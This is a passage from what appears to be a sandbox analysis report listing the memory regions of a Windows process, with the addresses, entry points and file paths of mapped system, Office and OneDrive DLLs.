= 0x7fef456ffff monitored = 0 entry_point = 0x7fef4551298 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 626 start_va = 0x7fef4570000 end_va = 0x7fef457ffff monitored = 0 entry_point = 0x7fef45795dc region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 627 start_va = 0x7fef4580000 end_va = 0x7fef480afff monitored = 0 entry_point = 0x7fef4586f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 628 start_va = 0x7fef4810000 end_va = 0x7fef4883fff monitored = 0 entry_point = 0x7fef48454c8 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 629 start_va = 0x7fef4890000 end_va = 0x7fef4900fff monitored = 0 entry_point = 0x7fef48cecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 630 start_va = 0x7fef4910000 end_va = 0x7fef4978fff monitored = 0 entry_point = 0x7fef4911198 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 631 start_va = 0x7fef4a50000 end_va = 0x7fef4a70fff monitored = 0 entry_point = 0x7fef4a573a0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 632 start_va = 0x7fef4af0000 end_va = 0x7fef4bacfff monitored = 0 entry_point = 0x7fef4af1ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 633 start_va = 0x7fef4bf0000 end_va = 0x7fef4bfbfff monitored = 0 entry_point = 0x7fef4bf602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 634 start_va = 0x7fef6a50000 end_va = 0x7fef6ac3fff monitored = 0 entry_point = 0x7fef6a566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 635 start_va = 0x7fef8580000 end_va = 0x7fef8588fff monitored = 0 entry_point = 0x7fef8582f98 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 636 start_va = 0x7fef8590000 end_va = 0x7fef85a7fff monitored = 0 entry_point = 0x7fef8591060 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 637 start_va = 0x7fef85b0000 end_va = 0x7fef85b9fff monitored = 0 entry_point = 0x7fef85b49f0 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 638 start_va = 0x7fef85d0000 end_va = 0x7fef861efff monitored = 0 entry_point = 0x7fef85d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 639 start_va = 0x7fef8620000 end_va = 0x7fef865afff monitored = 0 entry_point = 0x7fef8647600 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 640 start_va = 0x7fef8660000 end_va = 0x7fef869afff monitored = 0 entry_point = 0x7fef86622f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 641 start_va = 0x7fef86a0000 end_va = 0x7fef883bfff monitored = 0 entry_point = 0x7fef86a1030 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 642 start_va = 0x7fef8860000 end_va = 0x7fef88defff monitored = 0 entry_point = 0x7fef88b385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 643 start_va = 0x7fef88e0000 end_va = 0x7fef891afff monitored = 0 entry_point = 0x7fef88e1070 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 644 start_va = 0x7fef8920000 end_va = 0x7fef892afff monitored = 0 entry_point = 0x7fef8921030 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 645 start_va = 0x7fef8930000 end_va = 0x7fef89e9fff monitored = 0 entry_point = 0x7fef893115c region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 646 start_va = 0x7fef89f0000 end_va = 0x7fef8a6bfff monitored = 0 entry_point = 0x7fef89f11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 647 start_va = 0x7fef8a70000 end_va = 0x7fef8d12fff monitored = 0 entry_point = 0x7fef8a73498 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 648 start_va = 0x7fef8da0000 end_va = 0x7fef8dabfff monitored = 0 entry_point = 0x7fef8da1380 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 649 start_va = 0x7fef8db0000 end_va = 0x7fef8de3fff monitored = 0 entry_point = 0x7fef8db1890 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 650 start_va = 0x7fef8df0000 end_va = 0x7fef8eddfff monitored = 0 entry_point = 0x7fef8df12a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 651 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 652 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 653 start_va = 0x7fef95e0000 end_va = 0x7fef9662fff monitored = 0 entry_point = 0x7fef960692c region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 654 start_va = 0x7fef9670000 end_va = 0x7fef967afff monitored = 0 entry_point = 0x7fef9675740 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 655 start_va = 0x7fef9680000 end_va = 0x7fef9698fff monitored = 0 entry_point = 0x7fef969077c region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 656 start_va = 0x7fef96a0000 end_va = 0x7fef96e2fff monitored = 0 entry_point = 0x7fef96c1b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 657 start_va = 0x7fef9710000 end_va = 0x7fef972bfff monitored = 0 entry_point = 0x7fef9711198 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 658 start_va = 0x7fef9730000 end_va = 0x7fef9751fff monitored = 0 entry_point = 0x7fef9731198 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 659 start_va = 0x7fef9760000 end_va = 0x7fef987efff monitored = 0 entry_point = 0x7fef977339c region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 660 start_va = 0x7fef9880000 end_va = 0x7fef98a7fff monitored = 0 entry_point = 0x7fef9893cc4 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 661 start_va = 0x7fef9920000 end_va = 0x7fef9932fff monitored = 0 entry_point = 0x7fef992a8b8 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 662 start_va = 0x7fef9950000 end_va = 0x7fef9957fff monitored = 0 entry_point = 0x7fef9951030 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 663 start_va = 0x7fef9960000 end_va = 0x7fef99dffff monitored = 0 entry_point = 0x7fef9964a8c region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 664 start_va = 0x7fef99e0000 end_va = 0x7fef99eefff monitored = 0 entry_point = 0x7fef99e1040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 665 start_va = 0x7fef99f0000 end_va = 0x7fef99fbfff monitored = 0 entry_point = 0x7fef99f1070 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 666 start_va = 0x7fef9a00000 end_va = 0x7fef9a7dfff monitored = 0 entry_point = 0x7fef9a01304 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 667 start_va = 0x7fef9a80000 end_va = 0x7fef9ab4fff monitored = 0 entry_point = 0x7fef9a8c59c region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 668 start_va = 0x7fef9ac0000 end_va = 0x7fefa33dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 669 start_va = 0x7fefa340000 end_va = 0x7fefa4f8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 670 start_va = 0x7fefa500000 end_va = 0x7fefa815fff monitored = 0 entry_point = 0x7fefa503e98 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 671 start_va = 0x7fefa820000 end_va = 0x7fefa822fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 672 start_va = 0x7fefa830000 end_va = 0x7fefa832fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 673 start_va = 0x7fefa840000 end_va = 0x7fefa842fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 674 start_va = 0x7fefa850000 end_va = 0x7fefa852fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 675 start_va = 0x7fefa860000 end_va = 0x7fefa864fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 676 start_va = 0x7fefa870000 end_va = 0x7fefa874fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 677 start_va = 0x7fefa880000 end_va = 0x7fefa882fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 678 start_va = 0x7fefa890000 end_va = 0x7fefa92dfff monitored = 0 entry_point = 0x7fefa8d9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 679 start_va = 0x7fefa930000 end_va = 0x7fefa933fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 680 start_va = 0x7fefa940000 end_va = 0x7fefa943fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 681 start_va = 0x7fefa950000 end_va = 0x7fefa952fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 682 start_va = 0x7fefa960000 end_va = 0x7fefa963fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 683 start_va = 0x7fefa970000 end_va = 0x7fefa972fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 684 start_va = 0x7fefa980000 end_va = 0x7fefa982fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 685 start_va = 0x7fefa990000 end_va = 0x7fefa992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 686 start_va = 0x7fefa9a0000 end_va = 0x7fefa9a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 687 start_va = 0x7fefa9b0000 end_va = 0x7fefa9b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 688 start_va = 0x7fefa9c0000 end_va = 0x7fefa9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 689 start_va = 0x7fefa9d0000 end_va = 0x7fefaac1fff monitored = 0 entry_point = 0x7fefa9d9060 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 690 start_va = 0x7fefaad0000 end_va = 0x7fefaad3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 691 start_va = 0x7fefaae0000 end_va = 0x7fefaaf6fff monitored = 0 entry_point = 0x7fefaaec440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 692 start_va = 0x7fefab00000 end_va = 0x7fefad13fff monitored = 0 entry_point = 0x7fefab01000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 693 start_va = 0x7fefad20000 end_va = 0x7fefadedfff monitored = 0 entry_point = 0x7fefad430fc region_type = mapped_file name = "msvcr110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll") Region: id = 694 start_va = 0x7fefadf0000 end_va = 0x7fefae96fff monitored = 0 entry_point = 0x7fefae3b93c region_type = mapped_file name = "msvcp110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll") Region: id = 695 start_va = 0x7fefaea0000 end_va = 0x7fefaef5fff monitored = 0 entry_point = 0x7fefaea86e8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll") Region: id = 696 start_va = 0x7fefaf00000 end_va = 0x7fefaf56fff monitored = 0 entry_point = 0x7fefaf01118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 697 start_va = 0x7fefaf60000 end_va = 0x7fefb129fff monitored = 0 entry_point = 0x7fefaf67a60 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 698 start_va = 0x7fefb130000 end_va = 0x7fefb147fff monitored = 0 entry_point = 0x7fefb131010 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 699 start_va = 0x7fefb150000 end_va = 0x7fefb165fff monitored = 0 entry_point = 0x7fefb151050 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 700 start_va = 0x7fefb170000 end_va = 0x7fefb1b2fff monitored = 0 entry_point = 0x7fefb1730d8 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 701 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 702 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 703 start_va = 0x7fefb270000 end_va = 0x7fefb2d6fff monitored = 0 entry_point = 0x7fefb286060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 704 start_va = 0x7fefb2f0000 end_va = 0x7fefb2fafff monitored = 0 entry_point = 0x7fefb2f4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 705 start_va = 0x7fefb320000 end_va = 0x7fefb338fff monitored = 0 entry_point = 0x7fefb3211a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 706 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 707 start_va = 0x7fefb4b0000 end_va = 0x7fefb5d6fff monitored = 0 entry_point = 0x7fefb4b10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 708 start_va = 0x7fefb6c0000 end_va = 0x7fefb6c9fff monitored = 0 entry_point = 0x7fefb6c4938 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 709 start_va = 0x7fefb6d0000 end_va = 0x7fefb6d9fff monitored = 0 entry_point = 0x7fefb6d1198 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 710 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 711 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 712 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 713 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 714 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 715 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 716 start_va = 0x7fefbad0000 end_va = 0x7fefbbf9fff monitored = 0 entry_point = 0x7fefbad3810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 717 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 718 start_va = 0x7fefbc40000 end_va = 0x7fefbc57fff monitored = 0 entry_point = 0x7fefbc41130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 719 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 720 start_va = 0x7fefbcb0000 end_va = 0x7fefbcbafff monitored = 0 entry_point = 0x7fefbcb1020 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 721 start_va = 0x7fefbcc0000 end_va = 0x7fefbcfafff monitored = 0 entry_point = 0x7fefbccf410 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 722 start_va = 0x7fefbd00000 end_va = 0x7fefbd42fff monitored = 0 entry_point = 